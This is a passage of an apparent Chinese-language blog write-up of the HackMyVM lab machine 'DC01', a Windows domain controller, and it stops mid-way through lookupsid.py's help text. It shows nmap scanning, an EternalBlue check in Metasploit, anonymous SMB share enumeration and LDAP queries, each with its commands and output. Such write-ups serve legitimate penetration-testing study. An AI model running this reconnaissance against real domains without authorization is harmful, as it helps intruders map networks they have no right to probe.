{"id":783,"date":"2024-08-16T12:57:28","date_gmt":"2024-08-16T04:57:28","guid":{"rendered":"http:\/\/162.14.82.114\/?p=783"},"modified":"2024-08-16T12:57:28","modified_gmt":"2024-08-16T04:57:28","slug":"hmv-_-dc01","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/783\/08\/16\/2024\/","title":{"rendered":"hmv[-_-]DC01"},"content":{"rendered":"<h1>DC01<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257560.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257560.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240810203045009\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257562.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257562.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240810203822316\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nmap -Pn -sTCV -T4 $IP           \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-10 08:34 EDT\nNmap scan report for 192.168.10.102\nHost is up (0.0020s latency).\nNot shown: 989 filtered tcp ports (no-response)\nPORT     STATE SERVICE       VERSION\n53\/tcp   open  domain        Simple DNS Plus\n88\/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-11 03:40:33Z)\n135\/tcp  open  msrpc         Microsoft Windows RPC\n139\/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n389\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n445\/tcp  open  microsoft-ds?\n464\/tcp  open  kpasswd5?\n593\/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636\/tcp  open  tcpwrapped\n3268\/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)\n3269\/tcp open  tcpwrapped\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: 15h05m49s\n| smb2-time: \n|   date: 2024-08-11T03:40:34\n|_  start_date: N\/A\n|_nbstat: NetBIOS name: DC01, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:94:55:97 (Oracle VirtualBox virtual NIC)\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 68.42 seconds<\/code><\/pre>\n<p>\u53d1\u73b0<code>Domain: SOUPEDECODE.LOCAL0<\/code>\uff0c\u57df\u540d\u89e3\u6790\u4e00\u822c\u90fd\u662f\u5c0f\u5199\uff0c\u6dfb\u52a0\u8fdbdns<\/p>\n<pre><code class=\"language-text\">192.168.10.102      soupedecode.local<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u654f\u611f\u7aef\u53e3\u4fe1\u606f\u641c\u96c6<\/h3>\n<p>\u53d1\u73b0\u5f00\u4e86<code>445<\/code>\u7aef\u53e3\uff0c\u5148\u770b\u4e00\u4e0b\u6c38\u6052\u4e4b\u84dd\u80fd\u4e0d\u80fd\u4e00\u628a\u68ad\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ msfconsole -q                                                                                   \nmsf6 &gt; search ms17\n\nMatching Modules\n================\n\n   #   Name                                                  Disclosure Date  Rank     Check  Description\n   -   ----                                                  ---------------  ----     -----  -----------\n   0   exploit\/windows\/smb\/ms17_010_eternalblue              2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n   1     \\_ target: Automatic Target                         .                .        .      .\n   2     \\_ target: Windows 7                                .                .        .      .\n   3     \\_ target: Windows Embedded Standard 7              .                .        .      .\n   4     \\_ target: Windows Server 2008 R2                   .                .        .      .\n   5     \\_ target: Windows 8                                .                .        .      .\n   6     \\_ target: Windows 8.1                              .                .        .      .\n   7     \\_ target: Windows Server 2012                      .                .        .      .\n   8     \\_ target: Windows 10 Pro                           .                .        .      .\n   9     \\_ target: Windows 10 Enterprise Evaluation         .                .        .      .\n   10  exploit\/windows\/smb\/ms17_010_psexec                   2017-03-14       normal   Yes    MS17-010 EternalRomance\/EternalSynergy\/EternalChampion SMB Remote Windows Code Execution\n   11    \\_ target: Automatic                                .                .        .      .\n   12    \\_ target: PowerShell                               .                .        .      .\n   13    \\_ target: Native upload                            .                .        .      .\n   14    \\_ target: MOF upload                               .                .        .      .\n   15    \\_ AKA: ETERNALSYNERGY                              .                .        .      .\n   16    \\_ AKA: ETERNALROMANCE                              .                .        .      .\n   17    \\_ AKA: ETERNALCHAMPION                             .                .        .      .\n   18    \\_ AKA: ETERNALBLUE                                 .                .        .      .\n   19  auxiliary\/admin\/smb\/ms17_010_command                  2017-03-14       normal   No     MS17-010 EternalRomance\/EternalSynergy\/EternalChampion SMB Remote Windows Command Execution\n   20    \\_ AKA: ETERNALSYNERGY                              .                .        .      .\n   21    \\_ AKA: ETERNALROMANCE                              .                .        .      .\n   22    \\_ AKA: ETERNALCHAMPION                             .                .        .      .\n   23    \\_ AKA: ETERNALBLUE                                 .                .        .      .\n   24  auxiliary\/scanner\/smb\/smb_ms17_010                    .                normal   No     MS17-010 SMB RCE Detection\n   25    \\_ AKA: DOUBLEPULSAR                                .                .        .      .\n   26    \\_ AKA: ETERNALBLUE                                 .                .        .      .\n   27  exploit\/windows\/fileformat\/office_ms17_11882          2017-11-15       manual   No     Microsoft Office CVE-2017-11882\n   28  auxiliary\/admin\/mssql\/mssql_escalate_execute_as       .                normal   No     Microsoft SQL Server Escalate EXECUTE AS\n   29  auxiliary\/admin\/mssql\/mssql_escalate_execute_as_sqli  .                normal   No     Microsoft SQL Server SQLi Escalate Execute AS\n   30  exploit\/windows\/smb\/smb_doublepulsar_rce              2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution\n   31    \\_ target: Execute payload (x64)                    .                .        .      .\n   32    \\_ target: Neutralize implant                       .                .        .      .\n\nInteract with a module by name or index. For example info 32, use 32 or use exploit\/windows\/smb\/smb_doublepulsar_rce\nAfter interacting with a module you can manually set a TARGET with set TARGET &#039;Neutralize implant&#039;\n\nmsf6 &gt; use auxiliary\/scanner\/smb\/smb_ms17_010\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) &gt; options\n\nModule options (auxiliary\/scanner\/smb\/smb_ms17_010):\n\n   Name         Current Setting                                            Required  Description\n   ----         ---------------                                            --------  -----------\n   CHECK_ARCH   true                                                       no        Check for architecture on vulnerable hosts\n   CHECK_DOPU   true                                                       no        Check for DOUBLEPULSAR on vulnerable hosts\n   CHECK_PIPE   false                                                      no        Check for named pipe on vulnerable hosts\n   NAMED_PIPES  \/usr\/share\/metasploit-framework\/data\/wordlists\/named_pipe  yes       List of named pipes to check\n                s.txt\n   RHOSTS                                                                  yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT        445                                                        yes       The SMB service port (TCP)\n   SMBDomain    .                                                          no        The Windows domain to use for authentication\n   SMBPass                                                                 no        The password for the specified username\n   SMBUser                                                                 no        The username to authenticate as\n   THREADS      1                                                          yes       The number of concurrent threads (max one per host)\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) &gt; set RHOSTS 192.168.10.102\nRHOSTS =&gt; 192.168.10.102\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) &gt; run\n\n[-] 192.168.10.102:445    - An SMB Login Error occurred while connecting to the IPC$ tree.\n[*] 192.168.10.102:445    - Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed<\/code><\/pre>\n<p>\u770b\u6765\u4e0d\u884c\uff0c\u6309\u90e8\u5c31\u73ed\u7684\u641e\u5427\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbmap -H 192.168.10.102\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 0 SMB session(s)                                \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbmap -H 192.168.10.102 -u anonymous\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB session(s)                                \n\n[+] IP: 192.168.10.102:445      Name: 192.168.10.102            Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        ADMIN$                                                  NO ACCESS       Remote Admin\n        backup                                                  NO ACCESS\n        C$                                                      NO ACCESS       Default share\n        IPC$                                                    READ ONLY       Remote IPC\n        NETLOGON                                                NO ACCESS       Logon server share \n        SYSVOL                                                  NO ACCESS       Logon server share \n        Users                                                   NO ACCESS<\/code><\/pre>\n<p>\u4f7f\u7528\u9ed8\u8ba4\u7528\u6237<code>anonymous<\/code>\u53d1\u73b0\u6709\u4e2a<code>IPC$<\/code>\u53ef\u8bfb\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8bfb\u53d6\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient \/\/$IP\/IPC$             \nPassword for [WORKGROUP\\kali]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; dir\nNT_STATUS_NO_SUCH_FILE listing \\*<\/code><\/pre>\n<p>\u533f\u540d\u7528\u6237\u6ca1\u6709\u6743\u9650\u3002\u3002\u3002\u5c1d\u8bd5\u770b\u4e00\u4e0b\u5176\u4ed6\u7684\uff0c\u60f3\u5230\u4e86\u4e0a\u9762\u7684\u57df\u540d\u89e3\u6790\u3002\u4e0d\u77e5\u9053\u6709\u6ca1\u6709\u7528\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257564.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257564.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240810205916536\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257565.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257565.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240810211023448\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257566.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257566.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240810211048003\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ ldapsearch -x -H ldap:\/\/$IP -D &#039;&#039; -w &#039;&#039; -b &quot;DC=soupedecode,DC=local&quot;\n# extended LDIF\n#\n# LDAPv3\n# base &lt;DC=soupedecode,DC=local&gt; with scope subtree\n# filter: (objectclass=*)\n# requesting: ALL\n#\n\n# search result\nsearch: 2\nresult: 1 Operations error\ntext: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this opera\n tion a successful bind must be completed on the connection., data 0, v4f7c\n\n# numResponses: 1<\/code><\/pre>\n<p>\u4f3c\u4e4e\u6210\u529f\u4e86\uff0c\u4f3c\u4e4e\u53c8\u4e0d\u884c\u3002\u3002\u3002\u5148\u4e0d\u52a0domain\u8bd5\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">ldapsearch -x -H ldap:\/\/$IP -D &#039;&#039; -w &#039;&#039; -b &#039;&#039; -s base &quot;(objectclass=user)&quot;<\/code><\/pre>\n<blockquote>\n<ul>\n<li><code>-x<\/code>: \u4f7f\u7528\u7b80\u5355\u7ed1\u5b9a\uff08simple bind\uff09\u65b9\u6cd5\u8fdb\u884c\u8fde\u63a5\u3002\u8fd9\u4f1a\u7981\u7528 STARTTLS \u52a0\u5bc6\uff0c\u5982\u679c LDAP \u670d\u52a1\u5668\u652f\u6301 STARTTLS\uff0c\u5219 <code>-x<\/code> \u53c2\u6570\u5c06\u7ed5\u8fc7\u5b83\u3002<\/li>\n<li><code>-H<\/code>: \u6307\u5b9a LDAP \u670d\u52a1\u5668\u7684\u4f4d\u7f6e\u3002\u5728\u8fd9\u91cc <code>$IP<\/code> \u5e94\u8be5\u88ab\u66ff\u6362\u4e3a\u5b9e\u9645\u7684 LDAP \u670d\u52a1\u5668 IP \u5730\u5740\u6216\u8005\u4e3b\u673a\u540d\u3002<\/li>\n<li><code>-D<\/code>: \u6307\u5b9a\u6267\u884c\u7ed1\u5b9a\u64cd\u4f5c\u65f6\u4f7f\u7528\u7684 DN\uff08Distinguished Name\uff09\u3002\u5728\u8fd9\u91cc\u4f7f\u7528\u4e86\u7a7a\u5b57\u7b26\u4e32 <code>&#039;&#039;<\/code>\uff0c\u8fd9\u610f\u5473\u7740\u672a\u6307\u5b9a\u4efb\u4f55\u7279\u5b9a\u7684 DN \u8fdb\u884c\u533f\u540d\u7ed1\u5b9a\u6216\u4f7f\u7528\u9ed8\u8ba4\u7684\u533f\u540d DN\u3002<\/li>\n<li><code>-w<\/code>: \u6307\u5b9a\u6267\u884c\u7ed1\u5b9a\u64cd\u4f5c\u65f6\u4f7f\u7528\u7684\u5bc6\u7801\u3002\u540c\u6837\u5730\uff0c\u8fd9\u91cc\u4f7f\u7528\u4e86\u7a7a\u5b57\u7b26\u4e32 <code>&#039;&#039;<\/code> \u8868\u793a\u6ca1\u6709\u5bc6\u7801\u3002<\/li>\n<li><code>-b<\/code>: \u6307\u5b9a\u641c\u7d22\u7684\u57fa\u672c DN\uff0c\u5373\u641c\u7d22\u7684\u8d77\u70b9\u3002\u8fd9\u91cc\u4e5f\u4f7f\u7528\u4e86\u7a7a\u5b57\u7b26\u4e32 <code>&#039;&#039;<\/code>\uff0c\u8fd9\u610f\u5473\u7740\u4f7f\u7528\u9ed8\u8ba4\u7684\u57fa\u672c DN \u6216\u8005\u5c1d\u8bd5\u4ece\u6839\u5f00\u59cb\u641c\u7d22\u3002<\/li>\n<li><code>-s base<\/code>: \u6307\u5b9a\u641c\u7d22\u8303\u56f4\u3002<code>base<\/code> \u8868\u793a\u53ea\u8fd4\u56de\u57fa\u672c DN \u5bf9\u5e94\u7684\u5bf9\u8c61\u672c\u8eab\uff0c\u800c\u4e0d\u662f\u5b83\u7684\u5b50\u5bf9\u8c61\u3002<\/li>\n<li><code>&quot;(objectclass=user)&quot;<\/code>: \u8fd9\u662f LDAP \u641c\u7d22\u8fc7\u6ee4\u5668\uff0c\u8868\u793a\u53ea\u8fd4\u56de <code>objectClass<\/code> \u5c5e\u6027\u503c\u4e3a <code>user<\/code> \u7684\u6761\u76ee\u3002<\/li>\n<\/ul>\n<\/blockquote>\n<pre><code class=\"language-bash\"># extended LDIF\n#\n# LDAPv3\n# base &lt;&gt; with scope baseObject\n# filter: (objectclass=user)\n# requesting: ALL\n#\n\n#\ndn:\ndomainFunctionality: 7\nforestFunctionality: 7\ndomainControllerFunctionality: 7\nrootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL\nldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL\nisGlobalCatalogReady: TRUE\nsupportedSASLMechanisms: GSSAPI\nsupportedSASLMechanisms: GSS-SPNEGO\nsupportedSASLMechanisms: EXTERNAL\nsupportedSASLMechanisms: DIGEST-MD5\nsupportedLDAPVersion: 3\nsupportedLDAPVersion: 2\nsupportedLDAPPolicies: MaxPoolThreads\nsupportedLDAPPolicies: MaxPercentDirSyncRequests\nsupportedLDAPPolicies: MaxDatagramRecv\nsupportedLDAPPolicies: MaxReceiveBuffer\nsupportedLDAPPolicies: InitRecvTimeout\nsupportedLDAPPolicies: MaxConnections\nsupportedLDAPPolicies: MaxConnIdleTime\nsupportedLDAPPolicies: MaxPageSize\nsupportedLDAPPolicies: MaxBatchReturnMessages\nsupportedLDAPPolicies: MaxQueryDuration\nsupportedLDAPPolicies: MaxDirSyncDuration\nsupportedLDAPPolicies: MaxTempTableSize\nsupportedLDAPPolicies: MaxResultSetSize\nsupportedLDAPPolicies: MinResultSets\nsupportedLDAPPolicies: MaxResultSetsPerConn\nsupportedLDAPPolicies: MaxNotificationPerConn\nsupportedLDAPPolicies: MaxValRange\nsupportedLDAPPolicies: MaxValRangeTransitive\nsupportedLDAPPolicies: ThreadMemoryLimit\nsupportedLDAPPolicies: SystemMemoryLimitPercent\nsupportedControl: 1.2.840.113556.1.4.319\nsupportedControl: 1.2.840.113556.1.4.801\nsupportedControl: 1.2.840.113556.1.4.473\nsupportedControl: 1.2.840.113556.1.4.528\nsupportedControl: 1.2.840.113556.1.4.417\nsupportedControl: 1.2.840.113556.1.4.619\nsupportedControl: 1.2.840.113556.1.4.841\nsupportedControl: 1.2.840.113556.1.4.529\nsupportedControl: 1.2.840.113556.1.4.805\nsupportedControl: 1.2.840.113556.1.4.521\nsupportedControl: 1.2.840.113556.1.4.970\nsupportedControl: 1.2.840.113556.1.4.1338\nsupportedControl: 1.2.840.113556.1.4.474\nsupportedControl: 1.2.840.113556.1.4.1339\nsupportedControl: 1.2.840.113556.1.4.1340\nsupportedControl: 1.2.840.113556.1.4.1413\nsupportedControl: 2.16.840.1.113730.3.4.9\nsupportedControl: 2.16.840.1.113730.3.4.10\nsupportedControl: 1.2.840.113556.1.4.1504\nsupportedControl: 1.2.840.113556.1.4.1852\nsupportedControl: 1.2.840.113556.1.4.802\nsupportedControl: 1.2.840.113556.1.4.1907\nsupportedControl: 1.2.840.113556.1.4.1948\nsupportedControl: 1.2.840.113556.1.4.1974\nsupportedControl: 1.2.840.113556.1.4.1341\nsupportedControl: 1.2.840.113556.1.4.2026\nsupportedControl: 1.2.840.113556.1.4.2064\nsupportedControl: 1.2.840.113556.1.4.2065\nsupportedControl: 1.2.840.113556.1.4.2066\nsupportedControl: 1.2.840.113556.1.4.2090\nsupportedControl: 1.2.840.113556.1.4.2205\nsupportedControl: 1.2.840.113556.1.4.2204\nsupportedControl: 1.2.840.113556.1.4.2206\nsupportedControl: 1.2.840.113556.1.4.2211\nsupportedControl: 1.2.840.113556.1.4.2239\nsupportedControl: 1.2.840.113556.1.4.2255\nsupportedControl: 1.2.840.113556.1.4.2256\nsupportedControl: 1.2.840.113556.1.4.2309\nsupportedControl: 1.2.840.113556.1.4.2330\nsupportedControl: 1.2.840.113556.1.4.2354\nsupportedCapabilities: 1.2.840.113556.1.4.800\nsupportedCapabilities: 1.2.840.113556.1.4.1670\nsupportedCapabilities: 1.2.840.113556.1.4.1791\nsupportedCapabilities: 1.2.840.113556.1.4.1935\nsupportedCapabilities: 1.2.840.113556.1.4.2080\nsupportedCapabilities: 1.2.840.113556.1.4.2237\nsubschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=L\n OCAL\nserverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur\n ation,DC=SOUPEDECODE,DC=LOCAL\nschemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\nnamingContexts: DC=SOUPEDECODE,DC=LOCAL\nnamingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\nnamingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\nnamingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL\nnamingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL\nisSynchronized: TRUE\nhighestCommittedUSN: 45084\ndsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,\n CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\ndnsHostName: DC01.SOUPEDECODE.LOCAL\ndefaultNamingContext: DC=SOUPEDECODE,DC=LOCAL\ncurrentTime: 20240811041058.0Z\nconfigurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL\n\n# search result\nsearch: 2\nresult: 0 Success\n\n# numResponses: 2\n# numEntries: 1<\/code><\/pre>\n<p>\u540c\u6837\u53d1\u73b0\u4e86\u524d\u9762\u7684\u90a3\u4e2a\u57df\u540d\u6807\u5fd7\uff0c\u5982\u679c\u6ca1\u6709\u7ed9\u7684\u8bdd\uff0c\u53ef\u4ee5\u4ece\u8fd9\u91cc\u4e0b\u624b\uff01<\/p>\n<p><strong>\u4f7f\u7528 <code>ldapsearch<\/code>\uff1a<\/strong><\/p>\n<ul>\n<li>\u76ee\u7684\u662f\u4ece LDAP \u670d\u52a1\u5668\u4e2d\u83b7\u53d6\u7528\u6237\u5217\u8868\uff0c\u5305\u62ec\u7528\u6237\u540d\u7b49\u4fe1\u606f\u3002\u8fd9\u53ef\u4ee5\u901a\u8fc7\u533f\u540d\u6216\u5df2\u8ba4\u8bc1\u7684\u65b9\u5f0f\u8fdb\u884c\u3002<\/li>\n<li>\u901a\u8fc7 LDAP \u67e5\u8be2\uff0c\u53ef\u4ee5\u6536\u96c6\u5230\u7528\u6237\u7684 DN\uff08Distinguished Name\uff09\uff0c\u8fd9\u662f LDAP \u4e2d\u7528\u4e8e\u552f\u4e00\u6807\u8bc6\u7528\u6237\u8d26\u6237\u7684\u5b57\u7b26\u4e32\u3002<\/li>\n<\/ul>\n<p><strong>\u63a5\u4e0b\u6765\u5c1d\u8bd5\u4f7f\u7528 <code>lookupsid<\/code>\uff1a<\/strong><\/p>\n<ul>\n<li>\u5728\u83b7\u5f97\u4e86\u7528\u6237\u5217\u8868\u540e\uff0c\u4e0b\u4e00\u6b65\u53ef\u80fd\u662f\u60f3\u8981\u83b7\u53d6\u6bcf\u4e2a\u7528\u6237\u7684 SID\uff08Security Identifier\uff09\u3002\u8fd9\u662f\u56e0\u4e3a\u67d0\u4e9b\u64cd\u4f5c\uff0c\u5982\u6587\u4ef6\u6743\u9650\u68c0\u67e5\u6216\u6a21\u62df\u767b\u5f55\u7b49\uff0c\u53ef\u80fd\u9700\u8981\u4f7f\u7528 SID \u800c\u4e0d\u662f\u7528\u6237\u540d\u3002<\/li>\n<li>`lookupsid \u53ef\u4ee5\u901a\u8fc7\u7528\u6237\u7684 DN \u6216\u7528\u6237\u540d\u6765\u67e5\u627e\u76f8\u5e94\u7684 SID\u3002<\/li>\n<\/ul>\n<p><a href=\"https:\/\/github.com\/fortra\/impacket\/blob\/master\/examples\/lookupsid.py\">https:\/\/github.com\/fortra\/impacket\/blob\/master\/examples\/lookupsid.py<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ python3 lookupsid.py                                 \nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\nusage: lookupsid.py [-h] [-ts] [-target-ip ip address] [-port [destination port]] [-domain-sids] [-hashes LMHASH:NTHASH] [-no-pass] [-k] target [maxRid]\n\npositional arguments:\n  target                [[domain\/]username[:password]@]&lt;targetName or address&gt;\n  maxRid                max Rid to check (default 4000)\n\noptions:\n  -h, --help            show this help message and exit\n  -ts                   Adds 